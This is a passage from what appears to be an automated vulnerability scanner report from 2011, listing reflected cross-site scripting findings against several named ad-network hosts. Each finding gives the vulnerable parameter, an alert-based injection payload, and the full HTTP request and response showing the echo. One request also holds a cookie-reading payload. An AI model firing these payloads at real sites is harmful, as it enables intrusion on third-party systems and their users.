Set-Cookie: FFcat=1219,54,94;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "823f84fd-80e3-49ea762bb1f00"
Vary: Accept-Encoding
X-Varnish: 1854305258
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=88
Expires: Sun, 20 Mar 2011 17:16:05 GMT
Date: Sun, 20 Mar 2011 17:14:37 GMT
Connection: close
Content-Length: 892

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='5abb7";alert(1)//4ceb5a9102f';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=5abb7";alert(1)//4ceb5a9102f;z="+Math.random();}

if(zzuid=='unknown')zzuid='jhmxpQoBADYAAET@BzgAAAAW~022111';

var zzhasAd=undefined;


                   var zzpixie = new Image();
var zzRandom = Math.random();
va
...[SNIP]...

4.61. http://d7.zedo.com/bar/v16-403/d3/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-403/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17174'%3balert(1)//3005c8f29eb was submitted in the q parameter. This input was echoed as 17174';alert(1)//3005c8f29eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bar/v16-403/d3/jsc/fm.js?c=54/50/49&a=0&f=&n=1219&r=13&d=94&q=17174'%3balert(1)//3005c8f29eb&$=&s=1&z=0.18005222734063864 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.alexa.com/siteinfo/xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=jhmxpQoBADYAAET@BzgAAAAW~022111; __qca=P0-1757581032-1298497085187; FFChanCap=1512B1025,1#775797#834300#580897:1083,2#647866,8#647871,7#740741,22#647878,20#647876,17#740739#668672#648495,21#668688#831213:305,944#913010|0,1,1:0,2,2:0,1,1:0,19,1:0,19,1:0,33,15:0,19,1:0,19,1:0,33,15:0,20,2:0,19,1:0,20,2:0,19,1:0,24,1; PI=h749620Za805982Zc305002290%2C305002290Zs788Zt175; FFCap=1512B933,196008:1025,196206:598,169775|0,24,1:0,1,1:1,11,1; FFgeo=5386156; ZFFAbh=792B826,20|695_792#365Z1083_806#379Z1585_806#379Z798_807#380

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1219,54,94;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "823f84fd-80e3-49ea762bb1f00"
Vary: Accept-Encoding
X-Varnish: 1854305258
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=87
Expires: Sun, 20 Mar 2011 17:16:05 GMT
Date: Sun, 20 Mar 2011 17:14:38 GMT
Connection: close
Content-Length: 892

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='17174';alert(1)//3005c8f29eb';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=17174';alert(1)//3005c8f29eb;z="+Math.random();}

if(zzuid=='unknown')zzuid='jhmxpQoBADYAAET@BzgAAAAW~022111';

var zzhasAd
...[SNIP]...

4.62. http://d7.zedo.com/bar/v16-403/d3/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-403/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1bca3'%3balert(1)//faf01b8c8fc was submitted in the $ parameter. This input was echoed as 1bca3';alert(1)//faf01b8c8fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-403/d3/jsc/fmr.js?c=54/50/49&a=0&f=&n=1219&r=13&d=94&q=&$=1bca3'%3balert(1)//faf01b8c8fc&s=1&z=0.18005222734063864 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.alexa.com/siteinfo/xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=jhmxpQoBADYAAET@BzgAAAAW~022111; __qca=P0-1757581032-1298497085187; FFChanCap=1512B1025,1#775797#834300#580897:1083,2#647866,8#647871,7#740741,22#647878,20#647876,17#740739#668672#648495,21#668688#831213:305,944#913010|0,1,1:0,2,2:0,1,1:0,19,1:0,19,1:0,33,15:0,19,1:0,19,1:0,33,15:0,20,2:0,19,1:0,20,2:0,19,1:0,24,1; PI=h749620Za805982Zc305002290%2C305002290Zs788Zt175; FFCap=1512B933,196008:1025,196206:598,169775|0,24,1:0,1,1:1,11,1; FFgeo=5386156; ZFFAbh=792B826,20|695_792#365Z1083_806#379Z1585_806#379Z798_807#380; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1219:1bca3';alert(1)//faf01b8c8fc;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1219,54,94;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1512B933,196008:1025,196206:598,169775:1219,205340|0,24,1:0,1,1:1,11,1:0,28,1;expires=Tue, 19 Apr 2011 17:14:46 GMT;path=/;domain=.zedo.com;
ETag: "823f84fd-80e3-49ea762bb1f00"
Vary: Accept-Encoding
X-Varnish: 1854305258
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=79
Expires: Sun, 20 Mar 2011 17:16:05 GMT
Date: Sun, 20 Mar 2011 17:14:46 GMT
Connection: close
Content-Length: 2362

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',1bca3';alert(1)//faf01b8c8fc';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,1bca3';alert(1)//faf01b8c8fc;z="+Math.random();}

if(zzuid=='unknown')zzuid='jhmxpQoBADYAAET@BzgAAAAW~022111';

var zzhasA
...[SNIP]...

4.63. http://d7.zedo.com/bar/v16-403/d3/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-403/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2477"%3balert(1)//d617dfaf242 was submitted in the $ parameter. This input was echoed as d2477";alert(1)//d617dfaf242 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-403/d3/jsc/fmr.js?c=54/50/49&a=0&f=&n=1219&r=13&d=94&q=&$=d2477"%3balert(1)//d617dfaf242&s=1&z=0.18005222734063864 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.alexa.com/siteinfo/xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=jhmxpQoBADYAAET@BzgAAAAW~022111; __qca=P0-1757581032-1298497085187; FFChanCap=1512B1025,1#775797#834300#580897:1083,2#647866,8#647871,7#740741,22#647878,20#647876,17#740739#668672#648495,21#668688#831213:305,944#913010|0,1,1:0,2,2:0,1,1:0,19,1:0,19,1:0,33,15:0,19,1:0,19,1:0,33,15:0,20,2:0,19,1:0,20,2:0,19,1:0,24,1; PI=h749620Za805982Zc305002290%2C305002290Zs788Zt175; FFCap=1512B933,196008:1025,196206:598,169775|0,24,1:0,1,1:1,11,1; FFgeo=5386156; ZFFAbh=792B826,20|695_792#365Z1083_806#379Z1585_806#379Z798_807#380; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1219:d2477";alert(1)//d617dfaf242;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1219,54,94;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "823f84fd-80e3-49ea762bb1f00"
Vary: Accept-Encoding
X-Varnish: 1854305258
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=79
Expires: Sun, 20 Mar 2011 17:16:05 GMT
Date: Sun, 20 Mar 2011 17:14:46 GMT
Connection: close
Content-Length: 895

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',d2477";alert(1)//d617dfaf242';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,d2477";alert(1)//d617dfaf242;z="+Math.random();}

if(zzuid=='unknown')zzuid='jhmxpQoBADYAAET@BzgAAAAW~022111';

var zzhasAd=undefined;


                   var zzpixie = new Image();
var zzRandom = Math.random();
va
...[SNIP]...

4.64. http://d7.zedo.com/bar/v16-403/d3/jsc/fmr.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-403/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c1a7"%3balert(1)//814717ee126 was submitted in the q parameter. This input was echoed as 7c1a7";alert(1)//814717ee126 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-403/d3/jsc/fmr.js?c=54/50/49&a=0&f=&n=1219&r=13&d=94&q=7c1a7"%3balert(1)//814717ee126&$=&s=1&z=0.18005222734063864 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.alexa.com/siteinfo/xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=jhmxpQoBADYAAET@BzgAAAAW~022111; __qca=P0-1757581032-1298497085187; FFChanCap=1512B1025,1#775797#834300#580897:1083,2#647866,8#647871,7#740741,22#647878,20#647876,17#740739#668672#648495,21#668688#831213:305,944#913010|0,1,1:0,2,2:0,1,1:0,19,1:0,19,1:0,33,15:0,19,1:0,19,1:0,33,15:0,20,2:0,19,1:0,20,2:0,19,1:0,24,1; PI=h749620Za805982Zc305002290%2C305002290Zs788Zt175; FFCap=1512B933,196008:1025,196206:598,169775|0,24,1:0,1,1:1,11,1; FFgeo=5386156; ZFFAbh=792B826,20|695_792#365Z1083_806#379Z1585_806#379Z798_807#380; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1512B933,196008:1025,196206:598,169775:1219,205340|0,24,1:0,1,1:1,11,1:0,28,1;expires=Tue, 19 Apr 2011 17:14:39 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1219,54,94;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "823f84fd-80e3-49ea762bb1f00"
Vary: Accept-Encoding
X-Varnish: 1854305258
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=86
Expires: Sun, 20 Mar 2011 17:16:05 GMT
Date: Sun, 20 Mar 2011 17:14:39 GMT
Connection: close
Content-Length: 2359

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='7c1a7";alert(1)//814717ee126';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=7c1a7";alert(1)//814717ee126;z="+Math.random();}

if(zzuid=='unknown')zzuid='jhmxpQoBADYAAET@BzgAAAAW~022111';

var zzhasAd=undefined;


                       var zzStr = "s=1;u=jhmxpQoBADYAAET@BzgAAAAW~022111;z
...[SNIP]...

4.65. http://d7.zedo.com/bar/v16-403/d3/jsc/fmr.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-403/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload adc03'%3balert(1)//0a54ecf6cff was submitted in the q parameter. This input was echoed as adc03';alert(1)//0a54ecf6cff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-403/d3/jsc/fmr.js?c=54/50/49&a=0&f=&n=1219&r=13&d=94&q=adc03'%3balert(1)//0a54ecf6cff&$=&s=1&z=0.18005222734063864 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.alexa.com/siteinfo/xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=jhmxpQoBADYAAET@BzgAAAAW~022111; __qca=P0-1757581032-1298497085187; FFChanCap=1512B1025,1#775797#834300#580897:1083,2#647866,8#647871,7#740741,22#647878,20#647876,17#740739#668672#648495,21#668688#831213:305,944#913010|0,1,1:0,2,2:0,1,1:0,19,1:0,19,1:0,33,15:0,19,1:0,19,1:0,33,15:0,20,2:0,19,1:0,20,2:0,19,1:0,24,1; PI=h749620Za805982Zc305002290%2C305002290Zs788Zt175; FFCap=1512B933,196008:1025,196206:598,169775|0,24,1:0,1,1:1,11,1; FFgeo=5386156; ZFFAbh=792B826,20|695_792#365Z1083_806#379Z1585_806#379Z798_807#380; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1512B933,196008:1025,196206:598,169775:1219,205491|0,24,1:0,1,1:1,11,1:0,28,1;expires=Tue, 19 Apr 2011 17:14:39 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1219,54,94;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 21 Mar 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "823f84fd-80e3-49ea762bb1f00"
Vary: Accept-Encoding
X-Varnish: 1854305258
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=86
Expires: Sun, 20 Mar 2011 17:16:05 GMT
Date: Sun, 20 Mar 2011 17:14:39 GMT
Connection: close
Content-Length: 2357

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='adc03';alert(1)//0a54ecf6cff';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=adc03';alert(1)//0a54ecf6cff;z="+Math.random();}

if(zzuid=='unknown')zzuid='jhmxpQoBADYAAET@BzgAAAAW~022111';

var zzhasAd
...[SNIP]...

4.66. http://ds.addthis.com/red/psi/sites/seo101.co/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/seo101.co/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e3842<script>alert(1)</script>959784cc53a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/seo101.co/p.json?callback=_ate.ad.hpre3842<script>alert(1)</script>959784cc53a&uid=4d5af32c71c2e1a5&url=http%3A%2F%2Fseo101.co%2Fxss.cxc5cde%253C%2Ftitle%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E79857da5316&ref=http%3A%2F%2Fburp%2Fshow%2F8&yvtht3 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh35.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1300446510.66|1300446510.60|1300446510.1FE|1299801259.19A; dt=X; psc=4; uid=4d5af32c71c2e1a5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 431
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 20 Mar 2011 17:28:41 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 19 Apr 2011 17:28:41 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1300642121.1FE|1300642121.60|1299801259.19A|1300446510.66; Domain=.addthis.com; Expires=Tue, 19-Mar-2013 17:28:23 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sun, 20 Mar 2011 17:28:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 20 Mar 2011 17:28:41 GMT
Connection: close

_ate.ad.hpre3842<script>alert(1)</script>959784cc53a({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4d5af32c71c2e1a5","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d5af32c71c2e1a5&curl=http%3a%2f%2fseo101.co%2
...[SNIP]...

4.67. http://event.adxpose.com/event.flow [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 2d5be<script>alert(1)</script>fce206d5d8a was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fad_type%3Diframe%26ad_size%3D160x600%26section%3D674716%26bur%3D93455%26x%3Dhttp%3A%2F%2Fwww.burstnet.com%2Fads%2Fad16597a-map.cgi%2FBCPG175405.254264.267318%2FVTS%3D2RFlO.3dTL%2FK%3DADS_T150%2FSZ%3D120X600A%7C160X600A%2FV%3D2.3S%2F%2FREDIRURL%3D&uid=0xIawmmrsYYagWK1_67725292d5be<script>alert(1)</script>fce206d5d8a&xy=0%2C0&wh=160%2C600&vchannel=191678&cid=EMB&cookieenabled=1&screenwh=1920%2C1200&adwh=160%2C600&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?n3caAJxLCgAxV2cAAAAAAFbVDwAAAAAAAAAQAAoAAAAAABAAAQABDdL2EQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD2TgUAAAAAAAIAAQAAAAAAAAAAAAAA-D8AAAAAAAD4PwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACU5zluMBzPCfyPAYJZwS-weB2tSCNbGpLI1FFnAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad16597a-map.cgi%2FBCPG175405.254264.267318%2FVTS%3D2RFlO.3dTL%2FK%3DADS_T150%2FSZ%3D120X600A%7C160X600A%2FV%3D2.3S%2F%2FREDIRURL%3D,http%3A%2F%2Ftechie-buzz.com%2F%3Fref%3Dlogo,Z%3D160x600%26bur%3D93455%26s%3D674716%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad16597a%252dmap.cgi%252fBCPG175405.254264.267318%252fVTS%253d2RFlO.3dTL%252fK%253dADS%255fT150%252fSZ%253d120X600A%257c160X600A%252fV%253d2.3S%252f%252fREDIRURL%253d%26_salt%3D4137244318%26B%3D10%26u%3Dhttp%253A%252F%252Ftechie-buzz.com%252F%253Fref%253Dlogo%26r%3D0,8bf33f3c-5316-11e0-841b-003048d6d1c8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=69a5d959-2383-46d3-a91e-54766c81e851

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=ADE026FF19346D77021B5BFFB8432B42; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 146
Date: Sun, 20 Mar 2011 17:26:49 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("0xIawmmrsYYagWK1_67725292d5be<script>alert(1)</script>fce206d5d8a");

4.68. http://img.mediaplex.com/content/0/707/52222/44909_GEN09Products1_ebay_300x250.html [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/707/52222/44909_GEN09Products1_ebay_300x250.html

Issue detail

The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ad4e"><script>alert(1)</script>488b49970ed was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/707/52222/44909_GEN09Products1_ebay_300x250.html?mpck=rover.ebay.com%2Frover%2F1%2F707-52222-2108-51%2F4%3Fmpt%3Dcrqigfg%252CbgymsbjuNlcq%26siteid%3D77%26adid%3D275241%26fcid%3D275241%26so_ustat%3D3%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D91847a4012e0a0aa12f4d964fff8a6ae4f62549c%26ir_DAP_I5%3D1%26ir_DAP_I6%3D77%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26rvr_id%3D2194300057065ad4e"><script>alert(1)</script>488b49970ed&mpt=crqigfg%2CbgymsbjuNlcq&siteid=77&adid=275241&fcid=275241&so_ustat=3&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=91847a4012e0a0aa12f4d964fff8a6ae4f62549c&ir_DAP_I5=1&ir_DAP_I6=77&ir_DAP_I129=&ir_DAP_I130=&rvr_id=219430005706&mpvc=http%3A%2F%2Fadclient.uimserv.net%2Fevent.ng%2FType%3Dclick%26FlightID%3D271125%26AdID%3D690074%26TargetID%3D103547%26RawValues%3DSECTIONID%2Cgmx%2Fhomepage%2Fstart%2Fde%2F%26Redirect%3D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.gmx.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=879590159695; mojo3=1551:23636/10433:1629/3484:15222/15154:34833/12309:28674/14559:6676/12124:245/12896:1389/14302:28901/15017:13113/12525:37966/14960:18534

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:55:16 GMT
Server: Apache
Last-Modified: Wed, 06 Oct 2010 16:21:19 GMT
ETag: "690fd5-beb-491f52add3dc0"
Accept-Ranges: bytes
Content-Length: 6563
Content-Type: text/html; charset=ISO-8859-1

<!--300x250-->
<body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
<img src="http://img-cdn.mediaplex.com/0/707/52222/GEN09Products1_ebay_1_300x250.gif" width="300" height="250" use
...[SNIP]...
Nlcq&siteid=77&adid=275241&fcid=275241&so_ustat=3&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=91847a4012e0a0aa12f4d964fff8a6ae4f62549c&ir_DAP_I5=1&ir_DAP_I6=77&ir_DAP_I129=&ir_DAP_I130=&rvr_id=2194300057065ad4e"><script>alert(1)</script>488b49970ed&mpre=http%3A%2F%2Ffahrzeuge.shop.ebay.de%2Fitems%2FAutomobile__W0QQKraftstoffarta21cca3dZAutogasLPG77281078Q7cErdgasCNGcd9f0737QQ_dmptZAutomobileQQ_fcsfcZ0QQ_flnZ1QQ_fromfsbZ0QQ_sacatZ9801QQ_scZ1QQ_so
...[SNIP]...

4.69. http://img.mediaplex.com/content/0/707/52222/44909_GEN09Products1_ebay_300x250.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/707/52222/44909_GEN09Products1_ebay_300x250.html

Issue detail

The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d4fd"><script>alert(1)</script>d088635f3c3 was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/707/52222/44909_GEN09Products1_ebay_300x250.html?mpck=rover.ebay.com%2Frover%2F1%2F707-52222-2108-51%2F4%3Fmpt%3Dcrqigfg%252CbgymsbjuNlcq%26siteid%3D77%26adid%3D275241%26fcid%3D275241%26so_ustat%3D3%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D91847a4012e0a0aa12f4d964fff8a6ae4f62549c%26ir_DAP_I5%3D1%26ir_DAP_I6%3D77%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26rvr_id%3D219430005706&mpt=crqigfg%2CbgymsbjuNlcq&siteid=77&adid=275241&fcid=275241&so_ustat=3&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=91847a4012e0a0aa12f4d964fff8a6ae4f62549c&ir_DAP_I5=1&ir_DAP_I6=77&ir_DAP_I129=&ir_DAP_I130=&rvr_id=219430005706&mpvc=http%3A%2F%2Fadclient.uimserv.net%2Fevent.ng%2FType%3Dclick%26FlightID%3D271125%26AdID%3D690074%26TargetID%3D103547%26RawValues%3DSECTIONID%2Cgmx%2Fhomepage%2Fstart%2Fde%2F%26Redirect%3D6d4fd"><script>alert(1)</script>d088635f3c3 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.gmx.net/
